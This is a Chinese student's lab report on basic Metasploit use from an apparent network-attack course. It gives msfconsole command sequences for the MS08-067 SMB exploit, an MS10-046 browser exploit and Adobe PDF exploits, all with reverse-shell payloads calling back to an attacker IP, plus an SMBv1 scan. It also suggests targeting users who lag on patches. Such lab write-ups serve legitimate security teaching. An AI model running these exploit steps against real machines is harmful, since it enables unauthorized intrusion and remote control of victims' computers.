2017-2018-2 20155230《网络对抗技术》实验5:MSF基础应用
基础问题回答
- 用自己的话解释什么是exploit,payload,encode.
- exploit 就是运行该模块吧,在msf的模块中配置好各项属性后exploit一下就开始运行使用该模块了
- payload 是攻击载荷的统称,我们需要配置攻击载荷来选择获取靶机shell的方式
- encode 编码,是一种免杀的方式
实践过程记录
1、一个主动攻击实践
打开终端输入msfconsole,在msf命令行中输入search MS08-067搜索漏洞模块
输入use exploit/windows/smb/ms08_067_netapi使用该模块,这是一个针对Windows平台下smb服务ms08_067漏洞的渗透攻击
输入set payload generic/shell_reverse_tcp选择该攻击载荷,通过反弹连接获得shell权限
输入show payloads,查看需要配置的属性
输入set RHOST 192.168.241.138、set LHOST 192.168.241.134、set LPORT 5230配置属性
然后exploit进行监听
2、一个针对浏览器的攻击
输入search ms10_046查找漏洞
由于是要对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
输入set payload generic/shell_reverse_tcp选择该攻击载荷
输入show options,查看需要配置的属性
输入set SRVHOST 192.168.241.134、set LHOST 192.168.241.134、set LPORT 5230配置属性,其中SRVHOST是后门服务器,设置的是攻击者的IP
输入exploit生成URL
在windows端访问该URL
有个小插曲,windows端访问该url后,产生的后门被qq电脑管家直接查杀了。。。
输入sessions,可看到一个ID为2的连接
输入session -i 2,接入ID为2的连接,获取shell权限成功。
3、一个针对客户端的攻击
输入search adobe查询漏洞,我选择的是exploit/windows/fileformat/adobe_collectemailinfo
输入set payload windows/meterpreter/reverse_tcp选择该攻击载荷
输入set LHOST 192.168.241.134、set LPORT 5230配置属性
输入exploit,可以看到生成了msf.pdf
将它发送到windows xp靶机
输入相关命令开始监听
这里开启监听之后,在靶机运行pdf一直不能回连不知道是什么原因,猜测是回连的ip和端口写错了所以重做了两遍后门pdf!还是不能回连
因为得不到任何提示,重新选择漏洞windows/fileformat/adobe_cooltype_sing
将靶机上的pdf文件关闭后,监听被结束
4、成功应用任何一个辅助模块
我选择的是 auxiliary/scanner/smb/smb1
这个辅助模块是用于扫描目标ip是否支持smbv1协议
因为只检测靶机192.168.241.139,所以THREAD就可以默认是1,不做修改
run一下(也可以是exploit)
离实战还缺些什么技术或步骤?
找不到现行主流操作系统、浏览器、客户端的漏洞
针对客户端的漏洞攻击要如何才能让目标长时间运行该客户端,以有足够时间来进行相关操作
实践总结与体会
限于无法攻击更多是因为找不到存在于各个软件或操作系统的漏洞,所以当相关软件有漏洞补丁需要更新时,一定要及时更新!就像老师在课堂上说的,找不到漏洞没关系,可以去官网上看最新的漏洞补丁补的是哪个漏洞,然后针对该漏洞进行攻击,十有八九会有所收获,毕竟绝大多数人都没有及时更新补丁的习惯。
也是再一次感受到了msf的局限性,里面收录的漏洞虽然已经足够多,但大多是已经过时了的系统漏洞,要将它用于实战则需要我们自己向其内部添加一些最新的漏洞模块,这显然不太现实。
这门课是真的越学越想搞一波大事啊!感谢5233刘高乐同学的电脑!我的vm版本过低拷过来的靶机无法兼容,加上老师也有说过这次实验可以使用其他同学的电脑,就借用刘高乐同学的电脑完成了这次实验!
2017-2018-2 20155230《网络对抗技术》实验5:MSF基础应用的更多相关文章
- 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...
- 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...
- 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...
- 2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用 目录 实验内容与步骤 一个主动攻击实践 MS08-067(失败) ms17_010_psexec(成功且唯一) 一个针 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
- 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...
- 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8
<网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...
- 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...
随机推荐
- ISDBT中CC的处理疑问
一个针对日本的数字电视应用(ISDBT)里字幕处理有一些问题,规范文档庞大又复杂,读起来还觉得语焉不详.接手遗留项目尝试处理字幕显示的问题,边读spec边看代码,先猜测.试图理解既有逻辑,再分析问题产 ...
- phar 反序列化学习
前言 phar 是 php 支持的一种伪协议, 在一些文件处理函数的路径参数中使用的话就会触发反序列操作. 利用条件 phar 文件要能够上传到服务器端. 要有可用的魔术方法作为"跳板&qu ...
- 你用过这种奇葩的C#注释吗
博客园一位微软MVP的文章 http://www.cnblogs.com/asxinyu/p/4383402.html#autoid-0-0-0 摘录: 我这里说的奇葩,并不是脱离三种方式,而是其注释 ...
- Apache2启动错误Could not reliably determine the server's fully qualified domain name
错误情况: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using ...
- 使用Eclipse Debug的一些说明
目录 Debug视图 线程堆栈视图 变量视图 断点视图 表达式视图 代码视图 远程Debug 异常断点 条件断点 表达式 Debug定位第三方插件的问题 Debug一些经验 Debug视图 认识d ...
- Saltstack安装配置过程
一.安装配置 1.服务器配置情况 三台服务器,均需要关闭iptables和selinux(否则salt执行指令无效) master: 192.168.60.139 centos slave: 192. ...
- [CentOS7] [VMWARE] 增加磁盘空间后扩大逻辑分区
Learn to rescan disk in Linux VM when its backed vdisk in vmware is extended. This method does not r ...
- 指定的 DSN 中,驱动程序和应用程序之间的体系结构不匹配
在做通过 PL/SQL 导入Excel 数据的时候,在进行数据库连接的时候,选择DSN为Excel ,输入用户名和密码,进行Connect 出现错误“指定的 DSN 中,驱动程序和应用程序之间的体系结 ...
- 可选的binlog解析组件
本文的mysql-binlog-connector-java:https://github.com/shyiko/mysql-binlog-connector-java 阿里的canal:https: ...
- 自动代码质量分析(GitLab+JenKins+SonarQube)
自动代码质量分析(GitLab+JenKins+SonarQube) 1.需求场景 开发提交代码自动执行代码质量分析. 2.所需应用 GitLab,JenKins,SonarQube 3.架构图 4. ...